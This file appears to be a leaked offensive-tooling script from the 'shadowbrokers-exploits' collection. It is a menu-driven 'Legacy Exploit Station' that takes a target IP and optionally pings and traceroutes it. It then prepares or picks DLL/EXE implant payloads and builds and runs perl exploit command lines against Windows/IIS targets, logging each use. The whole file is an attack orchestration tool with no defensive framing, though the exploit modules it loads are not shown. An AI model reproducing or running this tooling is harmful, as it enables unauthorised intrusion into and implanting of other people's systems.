shadowbrokers-exploits/windows/Resources/LegacyWindowsExploits/Scripts/_LegacyExploit.dss

@include "_Arrays.dsi";
@include "_LpHelperFunctions.dsi";
@include "_Menu.dsi";
@include "_Paths.dsi";
@echo off;

string $logDir;
_GetLpLogsDirectory($logDir);
StrCat($logDir, "/LegacyExploits/");
FileMkdir($logDir);
string $rootDir;
_GetLpResourcesDirectory($rootDir);
StrCat($rootDir, "..");
_NormalizePath($rootDir);
string $expDir = "%_sgEnv{'script_path'}/../Exploits";
_NormalizePath($expDir);

# setup default params
string %params;
%params{'arch'}				= "i386";
%params{'os'}				= "winnt";
%params{'iis_root'}			= "C:\\inetpub";
%params{'root_dir'}			= $rootDir;
%params{'work_dir'}			= $logDir;
%params{'full_exploit_dir'}	= $expDir;
%params{'lp_dll'}			= "Resources/Pc/%params{'arch'}-%params{'os'}/PC_Exploit.dll";
%params{'project'}			= "Legacy Exploit Station";
%params{'nopause'}			= "true";
%params{'payload_exe_name'}	= "**NONE**";

FindExploits(%params);

# make sure we have a target IP
if (!_ChangeTargetIp(%params))
{
	return false;
}

# create menu
string %menu;
if (!_CreateMenu(%menu, %params{'project'}, %params{'hmenu'}) || !defined(%params{'hmenu'}) ||
	!_SetHeader(%menu, %params{'hmenu'}, "ExploitHeader" ) ||
	!_AddSection(%menu, %params{'hmenu'}, "Configuration", %params{'hsConfig'}) || !defined(%params{'hsConfig'}) ||
	!_AddOption(%menu, %params{'hsConfig'}, "Change target IP", "ChangeTargetIp") || 
	!_AddOption(%menu, %params{'hsConfig'}, "Change EXE name", "ChangeExeName") || 
	!_AddOption(%menu, %params{'hsConfig'}, "Change IIS location", "ChangeIISLocation") ||
	!_AddSection(%menu, %params{'hmenu'}, "Payload", %params{'hsPayload'}) || !defined(%params{'hsPayload'}) ||
	!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new DLL payload", "PrepDllPayload") ||
	!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new EXE payload", "PrepExePayload") ||
	!_AddOption(%menu, %params{'hsPayload'}, "Pick an existing payload", "PickPayload") ||
	!_AddSection(%menu, %params{'hmenu'}, "Actions", %params{'hsActions'}) || !defined(%params{'hsActions'}) ||
	!_AddOption(%menu, %params{'hsActions'}, "Run an exploit", "PerformExploit"))
{
	echo("*** Unable to create %params{'project'} menu ***", ERROR);
	return false;
}

return _ExecuteMenu(%menu, %params{'hmenu'}, %params);

#------------------------------------------------------------------------------
Sub ChangeExeName(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	
	return _ChangeExeName(%params);
	
}	/* end ChangeExeName */

#------------------------------------------------------------------------------
Sub ChangeTargetIp(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	return _ChangeTargetIp(%params);

}	/* end ChangeTargetIp */

#------------------------------------------------------------------------------#
Sub ChangeIISLocation(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	
	string $name;
	if (!GetInput("Enter the new IIS location", $name, %params{'iis_root'}) || !defined($name))
	{
		return true;
	}
	
	%params{'iis_root'} = $name;
	return true;
	
}	/* end ChangeIISLocation */

#------------------------------------------------------------------------------#
sub ExploitHeader(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	
	echo "Current Configuration:";
	
	echo("       Target IP : %params{'targetIP'}", DEFAULT);
	echo("        IIS Root : %params{'iis_root'}", DEFAULT);
	echo("          LP DLL : %params{'lp_dll'}", DEFAULT);
	
	if (!defined(%params{'payload_dll'}))
	{
		echo("     DLL Payload : None", WARNING);
	}
	else
	{
		echo("     DLL Payload : %params{'payload_dll_description'}", DEFAULT);
		
		# determine payload file short name
		string $shortFile;
		RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_dll'}, $shortFile);
		echo("                   $shortFile[0]/$shortFile[1]", DEFAULT);
	}

	if (!defined(%params{'payload_exe'}))
	{
		echo("     EXE Payload : None", WARNING);
	}
	else
	{
		echo("     EXE Payload : %params{'payload_exe_description'}", DEFAULT);
		
		string $shortFile;
		RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_exe'}, $shortFile);
		echo("                   $shortFile[0]/$shortFile[1]", DEFAULT);
		echo("        EXE Name : %params{'payload_exe_name'}", DEFAULT);
	}
	
	return true;
	
}	/* end ExploitHeader */

#------------------------------------------------------------------------------#
sub FindExploits(REF string %params)
{

	string $dirs;
	if (!FileGetDirs(%params{'full_exploit_dir'}, "*", $dirs))
	{
		return false;
	}
	
	for (int $i=0; $i < sizeof($dirs); $i++)
	{
		if (FileCheck("$dirs[$i]/disabled"))
		{
			continue;
		}
		
		string %config;
		if (!_ReadExploitConfig($dirs[$i], %config))
		{
			continue;
		}
		
		if (!defined(%config{'name'}))
		{
			string $parts;
			if (SplitPath($dirs[$i], $parts))
			{
				%config{'name'} = $parts[1];
			}
			else
			{
				%config{'name'} = $dirs[$i];
			}
		}
		
		_AppendString(%params{'exploits'}, $dirs[$i]);
		_AppendString(%params{'exploit_names'}, %config{'name'});
	}
	
	return true;

}	/* end FindExploits */

#------------------------------------------------------------------------------#
sub PerformExploit(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;

	if (!defined(%params{'payload_dll'}) && !defined(%params{'payload_exe'}))
	{
		echo("* No payloads set", ERROR);
		pause;
		return true;
	}
	
	string $choice;
	int $index;
	if (!_ExecuteSimpleMenu("Choose an exploit", %params{'exploit_names'}, $choice, $index) || !defined($choice))
	{
		return true;
	}
	
	if (!defined($index) || !defined(%params{'exploits'}[$index]))
	{
		echo("* Failed to find directory for $choice", ERROR);
		pause;
		return true;
	}
	
	string %config;
	if (!_ReadExploitConfig(%params{'exploits'}[$index], %config))
	{
		echo("* Failed to read exploit config", ERROR);
		pause;
		return true;
	}
	
	# fix up the options with our variables
	string $options = %config{'options'};
	string $parts;
	if (!RegExSplit("\\s", %config{'options'}, 0, $parts))
	{
		echo("* Failed to split up exploit options", ERROR);
		pause;
		return true;
	}
	
	# set relative exploit dir
	string $dirParts;
	if (!SplitPath(%params{'exploits'}[$index], $dirParts))
	{
		echo("* Failed to split dir parts", ERROR);
		pause;
		return true;
	}
	%params{'exploit_dir'} = "\\\"Exploits\\$dirParts[1]\\\"";
	
	string $cmdLine = "perl %config{'command'}";
	for (int $i=0; $i < sizeof($parts); $i++)
	{
		string $varName;
		if (RegExMatch("^\\\$(.*)\$", $parts[$i], $varName))
		{
			$parts[$i] = "%params{$varName}";
		}
		
		StrCat($cmdLine, " $parts[$i]");
	}
	
	string $rootDir = "%params{'full_exploit_dir'}/../";
	_NormalizePath($rootDir);
	StrCat($cmdLine, " -c $rootDir -v");
	
	@echo on;
	if (!`local run -command "$cmdLine" -redirect -directory "%params{'exploits'}[$index]"`)
	{
		echo("* Failed to run exploit", ERROR);
		pause;
		return true;
	}
	else
	{
		string $name;
		if (!RegExMatch("^(.*)\\s+\\(version .*\\).*\$", $choice, $name))
		{
			$name = $choice;
		}
		_RecordToolUse("$name", $choice);
	}
	@echo off;
	
	pause;
	return true;
	
}	/* end PerformExploit */

#------------------------------------------------------------------------------#
sub PickPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	
	string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3 -verbose";

	@record on;
	if (!`pc_pick $extraArgs`)
	{
		echo("* Failed to pick payload", ERROR);
		pause;
		return true;
	}
	@record off;
	
	string $file, $name, $binType;
	if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
		!GetCmdData("Payload::File", $file) || !defined($file) ||
		!GetCmdData("Payload::BinType", $binType) || !defined($binType))
	{
		echo("* Failed to get payload information", ERROR);
		pause;
		return true;
	}
	
	if ($binType == "sharedlib")
	{
		%params{'payload_dll_description'} = $name;
		%params{'payload_dll'} = $file;
	}
	else
	{
		%params{'payload_exe_description'} = $name;
		%params{'payload_exe'} = $file;
		
		_ChangeExeName(%params);
	}
	return true;
	
}	/* end PickPayload */

#------------------------------------------------------------------------------
sub PrepDllPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{

	$cont = true;
	
	%params{'loadBinType'} = "sharedlib";
	return PrepPayload(%params, %params{'payload_dll_description'}, %params{'payload_dll'});

}	/* end PrepDllPayload */

#------------------------------------------------------------------------------
sub PrepExePayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
	$cont = true;
	
	%params{'loadBinType'} = "exe";
	return PrepPayload(%params, %params{'payload_exe_description'}, %params{'payload_exe'});

}	/* end PrepExePayload */

#------------------------------------------------------------------------------
sub PrepPayload(REF string %params, OUT string $payloadName, OUT string $payloadFile)
{

	string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3";
	StrCat($extraArgs, " -binType %params{'loadBinType'}");
	
	@record on;
	if (!`pc_prep $extraArgs`)
	{
		echo("* Failed to configure payload", ERROR);
		return true;
	}
	@record off;
	
	# assume that they want to pick whatever one they just configured
	string $file, $name;
	if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
		!GetCmdData("Payload::File", $file) || !defined($file))
	{
		echo("* Failed to get payload information", ERROR);
		return true;
	}
	
	$payloadName	= $name;
	$payloadFile	= $file;
	
	if (%params{'loadBinType'} == "exe")
	{
		_ChangeExeName(%params);
	}
	return true;
	
}	/* end PrepPayload */

#------------------------------------------------------------------------------
Sub _ChangeExeName(REF string %params)
{

	string $name;
	if (!GetInput("Enter the new EXE name", $name, %params{'payload_exe_name'}) || !defined($name))
	{
		return true;
	}
	
	%params{'payload_exe_name'} = $name;
	return true;
	
}	/* end _ChangeExeName */

#------------------------------------------------------------------------------
Sub _ChangeTargetIp(REF string %params)
{

	# get the target IP
	while (true)
	{
		string $temp;
		if (GetInput("Enter the target IP", $temp))
		{
			if (RegExMatch("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\$", $temp))
			{
				# good ip
				%params{'targetIP'} = $temp;
				
				if (prompt("Do you want to ping the target?"))
				{
					@echo on;
					`ping %params{'targetIP'} -timeout 15s`;
					@echo off;
					if (!prompt("Do you want to continue?"))
					{
						return false;
					}
				}

				if (prompt("Do you want to do a traceroute to the target?"))
				{
					@echo on;
					`traceroute %params{'targetIP'} -icmp -maxhops 30 -timeout 15s`;
					@echo off;
					if (!prompt("Do you want to continue?"))
					{
						return false;
					}
				}
				return true;
			}
			else
			{
				echo("The value must be of the form ###.###.###.###", ERROR);
			}
		}
	}
	
	# shouldn't get here
	return false;

}	/* end _ChangeTargetIp */

#------------------------------------------------------------------------------
sub _ReadExploitConfig(IN string $dir, OUT string %config)
{

	string $lines;
	if (!ReadFile("$dir/exploit.cfg", $lines))
	{
		return false;
	}
	
	for (int $j=0; $j < sizeof($lines); $j++)
	{
		string $parts;
		if (RegExSplit("=", $lines[$j], 2, $parts) && (sizeof($parts) == 2))
		{
			%config{$parts[0]} = $parts[1];
		}
	}
	
	return true;
		
}	/* end _ReadExploitConfig */